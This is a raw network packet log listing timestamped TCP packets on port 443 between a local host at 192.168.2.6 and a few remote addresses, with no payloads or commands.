Nov 21, 2024 09:53:49.514472008 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.514488935 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.516432047 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.517369986 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.517440081 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.517483950 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.517560959 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.517596006 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.517621040 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.519889116 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.519920111 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.519992113 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.520030022 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.520057917 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.521851063 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.521868944 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.521944046 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.521945000 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.521960974 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.522003889 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.522003889 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.526890993 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.526963949 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.526985884 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.527005911 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.527046919 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.527046919 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.528661966 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.528717041 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.528743982 CET	49771	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:53:49.528764963 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.528779030 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.528798103 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:49.528826952 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.528826952 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.528882980 CET	49771	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:53:49.529942036 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.529959917 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.530009031 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.530035973 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.530075073 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.530098915 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.530620098 CET	49771	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:53:49.530637980 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:49.536427021 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.536474943 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.536515951 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.536530972 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.536570072 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.536592007 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.536890030 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.536923885 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.536936045 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.536940098 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.536973953 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.536988020 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.537050962 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.537062883 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.537075043 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.537075043 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.537211895 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.545527935 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.545588017 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.545655966 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.545670033 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.545698881 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.545749903 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.546180010 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.546238899 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.546381950 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.546397924 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.546525955 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.554613113 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.554662943 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.554716110 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.554740906 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.554764986 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.554806948 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.556401014 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.556463957 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.556484938 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.556500912 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.556546926 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.556548119 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.563694954 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.563755989 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.563788891 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.563797951 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.563853025 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.573374033 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.573426008 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.573450089 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.573458910 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.573487043 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.573506117 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.583306074 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.583369970 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.583395958 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.583410978 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.583441019 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.583460093 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.635426044 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.635459900 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.635525942 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.635552883 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.635636091 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.635657072 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.643495083 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.643524885 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.643578053 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.643593073 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.643619061 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.643639088 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.650520086 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.650541067 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.650610924 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.650626898 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.650660038 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.651384115 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.658579111 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.658611059 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.658669949 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.658685923 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.658716917 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.658735991 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.666158915 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.666184902 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.666235924 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.666260958 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.666287899 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.667367935 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.674220085 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.674241066 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.674318075 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.674335003 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.675312042 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.675736904 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.675766945 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.675817013 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.675829887 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.675854921 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.675900936 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.682460070 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.682482958 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.682537079 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.682563066 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.682600021 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.682610035 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.682615042 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.682621002 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.682641983 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.682668924 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.682676077 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.686323881 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.686386108 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.686429024 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.686460018 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.686475992 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.687243938 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.689349890 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.689369917 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.689428091 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.689441919 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.689466953 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.689488888 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.690357924 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.690380096 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.690438032 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.690438032 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.690447092 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.690619946 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.694189072 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.694253922 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.694274902 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.694298983 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.694315910 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.694335938 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.698466063 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.698488951 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.698542118 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.698549032 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.698611021 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.698611021 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.701148987 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.701210976 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.701263905 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.701286077 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.701301098 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.703202963 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.705394030 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.705416918 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.705702066 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.705712080 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.707396030 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.709062099 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.709069967 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.709124088 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.709140062 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.709177971 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.713987112 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.714009047 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.714082956 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.714091063 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.714284897 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.714284897 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.716826916 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.716871977 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.717025042 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.717025042 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.717056990 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.719295025 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.721026897 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.721060038 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.721132994 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.721142054 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.721163988 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.723393917 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.724236012 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.724263906 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.724306107 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.724314928 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.724349022 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.727297068 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.728981018 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.729012012 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.729094982 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.729111910 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.729130030 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.729161978 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.729171991 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.729235888 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.729265928 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.729331017 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.729366064 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.729389906 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.732172966 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.732209921 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.732276917 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.732336998 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.732372046 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.734091043 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.736608028 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.736680031 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.736727953 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.736742973 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.736771107 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.736788988 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.745228052 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.745254040 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.745327950 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.745342970 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.745393038 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.745393038 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.748002052 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.748106003 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.748106003 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.748140097 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.748169899 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.748184919 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.754028082 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.754075050 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.754143953 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.754163980 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.754193068 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.755373955 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.761768103 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.761815071 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.761862993 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.761873960 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.761914015 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.761931896 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.770899057 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.770942926 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.770984888 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.770994902 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.771030903 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.771054983 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.778410912 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.778539896 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.778548956 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.778580904 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.778610945 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.778628111 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.787297010 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.787370920 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.787395000 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.787425041 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.787442923 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.787463903 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.836621046 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.836654902 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.836711884 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.836757898 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.836786032 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.836806059 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.844676971 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.844702005 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.844754934 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.844778061 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.844804049 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.844821930 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.846012115 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.846088886 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.846101999 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.846127033 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.846153021 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.846179008 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.846204042 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.846204042 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.867919922 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.867954016 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.868029118 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.868043900 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.868067026 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.868088961 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.875264883 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.875300884 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.875358105 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.875371933 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.875416994 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.875416994 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.878072977 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.878138065 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.878190041 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.878220081 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.878242016 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.878494024 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.882276058 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.882313013 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.882424116 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.882424116 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.882447958 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.882572889 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.885936975 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.885988951 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.886048079 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.886071920 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.886089087 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.886111021 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.890345097 CET	443	49759	150.171.27.10	192.168.2.6
